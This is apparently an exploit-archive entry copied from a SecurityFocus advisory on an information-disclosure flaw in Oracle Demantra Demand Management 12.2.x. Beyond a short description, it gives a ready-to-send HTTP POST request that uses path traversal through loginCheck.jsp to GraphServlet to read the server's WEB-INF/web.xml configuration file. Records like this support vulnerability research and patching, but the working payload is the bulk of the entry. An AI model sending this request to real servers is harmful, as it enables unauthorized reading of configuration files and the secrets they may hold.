23 lines
No EOL
949 B
Text
23 lines
No EOL
949 B
Text
source: http://www.securityfocus.com/bid/64836/info
|
|
|
|
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
|
|
|
|
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
|
|
|
|
Attackers can exploit this issue to obtain sensitive information.
|
|
|
|
This vulnerability affects the following supported versions:
|
|
12.2.0, 12.2.1, 12.2.2
|
|
|
|
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
|
|
Host: target.com:8080
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 46
|
|
|
|
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml |